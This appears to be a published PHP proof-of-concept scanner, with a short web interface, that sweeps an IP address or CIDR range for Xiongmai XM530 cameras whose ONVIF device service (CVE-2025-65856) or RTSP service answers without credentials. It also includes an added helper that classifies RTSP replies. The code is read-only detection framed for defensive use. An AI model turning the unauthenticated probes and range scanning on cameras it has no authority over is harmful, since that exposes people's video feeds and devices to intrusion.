
Xiongmai XM530 ONVIF / RTSP Security Scanner

=============================================================================================================================================
| # Title : Xiongmai XM530 ONVIF & RTSP Security Scanner for IP Cameras |
| # Author : [email address hidden by the hosting site] |
| # Tested on : Windows 11 Fr (Pro) / browser : Mozilla Firefox 145.0.2 (64 bits) |
| # Vendor : https://www.xiongmaitech.com/ |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/213044/ & CVE-2025-65856

[+] Summary : This project is a unified PHP-based security scanner designed to identify critical vulnerabilities in IP cameras,
with a primary focus on ONVIF authentication bypass (CVE-2025-65856) and unauthenticated RTSP stream exposure.
The tool provides a single-file web interface that allows scanning a single IP address or an entire network range (CIDR), detecting exposed services,
fingerprinting device information (manufacturer and model), and assessing risk severity (LOW, MEDIUM, HIGH, CRITICAL).
The scanner is optimized for defensive security assessments and SOC use cases, generating structured JSON-compatible results suitable for SIEM ingestion.
It operates without external libraries, supports AJAX-based scanning without page reloads, and is fully compatible with standard PHP environments such as XAMPP.

[+] Key capabilities include:

- Detection of ONVIF authentication bypass vulnerabilities
- Identification of exposed RTSP streams without credentials
- Automatic severity classification based on exposure level
- Device fingerprinting (manufacturer / model when available)
- Network-wide scanning via CIDR notation
- Lightweight, single-file PHP web interface
- Read-only, non-destructive Proof-of-Concept suitable for lawful security testing

[+] POC : How to Use It

1. Place the file inside: htdocs/camera_scanner.php
2. Open your browser: http://localhost/camera_scanner.php
3. Example input: 192.168.1.10 or 192.168.1.0/24

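<?php
// Single-file scanner: the POST handler near the end returns JSON,
// the HTML after the closing tag is the user interface.

set_time_limit(0);
error_reporting(E_ALL & ~E_WARNING);

// TCP connect test: true when the port accepts a connection within $timeout seconds.
function port_open($ip, $port, $timeout = 2) {
    $fp = @fsockopen($ip, $port, $errno, $errstr, $timeout);
    if ($fp) {
        fclose($fp);
        return true;
    }
    return false;
}

// Map the two findings to a severity label.
function severity($onvif, $rtsp) {
    if ($onvif && $rtsp) return "CRITICAL";
    if ($onvif) return "HIGH";
    if ($rtsp) return "MEDIUM";
    return "LOW";
}

// Send GetDeviceInformation with no WS-Security header. A reply that carries
// device details means the device answered the call without credentials.
function check_onvif($ip, $port) {
    $soap = <<<XML
<?xml version="1.0" encoding="UTF-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
<s:Body>
<GetDeviceInformation xmlns="http://www.onvif.org/ver10/device/wsdl"/>
</s:Body>
</s:Envelope>
XML;

    $opts = [
        'http' => [
            'method'  => "POST",
            'header'  => "Content-Type: application/soap+xml\r\n",
            'content' => $soap,
            'timeout' => 3
        ]
    ];

    $ctx = stream_context_create($opts);
    $url = "http://$ip:$port/onvif/device_service";
    // file_get_contents() returns false on HTTP error statuses, so SOAP faults
    // sent with a 4xx/5xx status are not counted as a finding.
    $res = @file_get_contents($url, false, $ctx);

    if ($res && strpos($res, "Manufacturer") !== false) {
        // Elements are usually namespace-prefixed (for example tds:Manufacturer),
        // so the prefix is optional in both patterns.
        preg_match('/<(?:\w+:)?Manufacturer>(.*?)<\/(?:\w+:)?Manufacturer>/s', $res, $m);
        preg_match('/<(?:\w+:)?Model>(.*?)<\/(?:\w+:)?Model>/s', $res, $mo);
        return [
            "onvif"        => true,
            "manufacturer" => $m[1] ?? "Unknown",
            "model"        => $mo[1] ?? "Unknown",
            "port"         => $port
        ];
    }
    return ["onvif" => false];
}

// Send one RTSP OPTIONS request without credentials and inspect the status line.
function check_rtsp($ip, $port) {
    $fp = @fsockopen($ip, $port, $e, $s, 2);
    if ($fp) {
        stream_set_timeout($fp, 2); // do not block forever on a silent peer
        fwrite($fp, "OPTIONS rtsp://$ip RTSP/1.0\r\nCSeq: 1\r\n\r\n");
        $r = (string) fread($fp, 256);
        fclose($fp);
        // Count only a 200 status line. A 401 challenge, or another protocol's
        // banner that merely contains "RTSP", is not an unauthenticated answer.
        // Note: a 200 to OPTIONS shows the service answers without credentials;
        // it does not by itself prove that a stream can be read.
        if (preg_match('/^RTSP\/\d\.\d 200\b/', $r)) return true;
    }
    return false;
}

// Probe the usual ONVIF and RTSP ports of one host and build a result record.
function scan_ip($ip) {
    $onvif = false;
    $rtsp  = false;
    $info  = [];

    foreach ([80, 8899, 8080] as $p) {
        if (port_open($ip, $p)) {
            $r = check_onvif($ip, $p);
            if ($r['onvif']) {
                $onvif = true;
                $info  = $r;
                break;
            }
        }
    }

    foreach ([554, 8554] as $p) {
        if (port_open($ip, $p) && check_rtsp($ip, $p)) {
            $rtsp = true;
            $info['rtsp_port'] = $p;
            break;
        }
    }

    return [
        "ip"           => $ip,
        "onvif"        => $onvif,
        "rtsp"         => $rtsp,
        "manufacturer" => $info['manufacturer'] ?? "-",
        "model"        => $info['model'] ?? "-",
        "severity"     => severity($onvif, $rtsp),
        "time"         => date("Y-m-d H:i:s")
    ];
}

/* ================= AJAX ================= */

if (isset($_POST['target']) && is_string($_POST['target'])) {
    $target  = trim($_POST['target']);
    $results = [];
    $valid   = true;

    // The target is interpolated into a URL and into an RTSP request line,
    // so only a literal IPv4 address or IPv4/prefix is accepted.
    if (strpos($target, "/") !== false) {
        [$net, $cidr] = explode("/", $target, 2);
        $valid = filter_var($net, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) !== false
            && ctype_digit($cidr) && (int) $cidr <= 32;

        if ($valid) {
            $cidr  = (int) $cidr;
            $size  = 1 << (32 - $cidr);             // addresses in the block
            $start = ip2long($net) & ~($size - 1);  // network address
            $end   = $start + $size - 1;            // broadcast address
            // /31 and /32 have no separate network or broadcast address to skip.
            $skip  = $cidr >= 31 ? 0 : 1;

            for ($i = $start + $skip; $i <= $end - $skip; $i++) {
                $ip = long2ip($i);
                $r  = scan_ip($ip);
                if ($r['onvif'] || $r['rtsp']) {
                    $results[] = $r;
                }
            }
        }
    } elseif (filter_var($target, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) !== false) {
        $results[] = scan_ip($target);
    } else {
        $valid = false;
    }

    if (!$valid) {
        http_response_code(400); // rejected input; the body stays an empty array
    }
    header("Content-Type: application/json");
    echo json_encode($results, JSON_PRETTY_PRINT);
    exit;
}
?>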

<!DOCTYPE html>
<html lang="en" dir="ltr">
<head>
<meta charset="utf-8">
<title>Camera Security Scanner</title>
<style>
body{font-family:tahoma;background:#0f172a;color:#e5e7eb}
.box{width:900px;margin:30px auto;background:#020617;padding:20px;border-radius:10px}
input,button{padding:10px;width:100%;margin:5px 0}
button{background:#2563eb;color:#fff;border:0;cursor:pointer}
pre{background:#020617;padding:10px;max-height:400px;overflow:auto}
.CRITICAL{color:#dc2626}
.HIGH{color:#f97316}
.MEDIUM{color:#eab308}
</style>
</head>

<body>
<div class="box">
<h2>ONVIF / RTSP Camera Scanner</h2>

<input id="target" placeholder="192.168.1.10 or 192.168.1.0/24">
<button onclick="scan()">Start scan</button>

<pre id="out"></pre>
</div>

<script>
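function scan(){
    const out = document.getElementById("out");
    out.textContent = "Scanning...";
    fetch("", {
        method: "POST",
        headers: {"Content-Type": "application/x-www-form-urlencoded"},
        body: "target=" + encodeURIComponent(document.getElementById("target").value)
    })
    .then(r => {
        // Surface server-side errors instead of failing silently in r.json().
        if (!r.ok) throw new Error("HTTP " + r.status);
        return r.json();
    })
    .then(d => {
        let o = "";
        d.forEach(x => {
            o += `[${x.severity}] ${x.ip} | ONVIF:${x.onvif} RTSP:${x.rtsp}\n`;
        });
        // textContent keeps device-supplied strings from being parsed as HTML.
        out.textContent = o || "No exposed ONVIF or RTSP service found.";
    })
    .catch(e => { out.textContent = "Scan failed: " + e.message; });
}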
</script>
</body>
</html>
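
check_rtsp() above decides from a single OPTIONS reply. The following added example (not part of the original scanner; classify_rtsp_reply() is a hypothetical helper and the three replies are constructed samples) shows how such a reply can be classified by status code and headers, so that a 401 challenge or a non-RTSP banner is not recorded as an exposed stream.

```php
<?php
// Added example, not part of the original scanner.
// classify_rtsp_reply() is a hypothetical helper name.

function classify_rtsp_reply(string $raw): array {
    // Keep only the head of the reply, then split it into lines.
    $head  = explode("\r\n\r\n", $raw, 2)[0];
    $lines = explode("\r\n", $head);

    // The first line must be an RTSP status line, e.g. "RTSP/1.0 200 OK".
    if (!preg_match('/^RTSP\/\d\.\d (\d{3})\b/', $lines[0], $m)) {
        return ["state" => "NOT_RTSP", "code" => null, "auth" => null];
    }
    $code = (int) $m[1];

    // Collect headers with lower-cased names for case-insensitive lookup.
    $headers = [];
    foreach (array_slice($lines, 1) as $line) {
        if (strpos($line, ":") === false) continue;
        [$name, $value] = explode(":", $line, 2);
        $headers[strtolower(trim($name))] = trim($value);
    }

    if ($code === 401) {
        // A challenge means the server enforces authentication.
        $scheme = strtok($headers["www-authenticate"] ?? "unknown", " ");
        return ["state" => "AUTH_REQUIRED", "code" => $code, "auth" => $scheme];
    }
    if ($code === 200) {
        // The service answered OPTIONS without credentials. Whether a stream
        // is readable is decided by the replies to later requests.
        return ["state" => "ANSWERED_WITHOUT_AUTH", "code" => $code, "auth" => null];
    }
    return ["state" => "OTHER", "code" => $code, "auth" => null];
}

// Constructed sample replies. The last one contains the substring "RTSP"
// but is not an RTSP reply, so a plain substring match would misreport it.
$samples = [
    "open"    => "RTSP/1.0 200 OK\r\nCSeq: 1\r\nPublic: OPTIONS, DESCRIBE, SETUP, PLAY\r\n\r\n",
    "guarded" => "RTSP/1.0 401 Unauthorized\r\nCSeq: 1\r\n"
               . "WWW-Authenticate: Digest realm=\"cam\", nonce=\"abc123\"\r\n\r\n",
    "banner"  => "HTTP/1.1 400 Bad Request\r\nServer: not an RTSP service\r\n\r\n",
];
foreach ($samples as $label => $reply) {
    echo $label, " => ", json_encode(classify_rtsp_reply($reply)), "\n";
}
```

Recording the state and status code alongside the scanner's severity field lets a SIEM rule separate cameras that answer without credentials from those that return a challenge.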

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================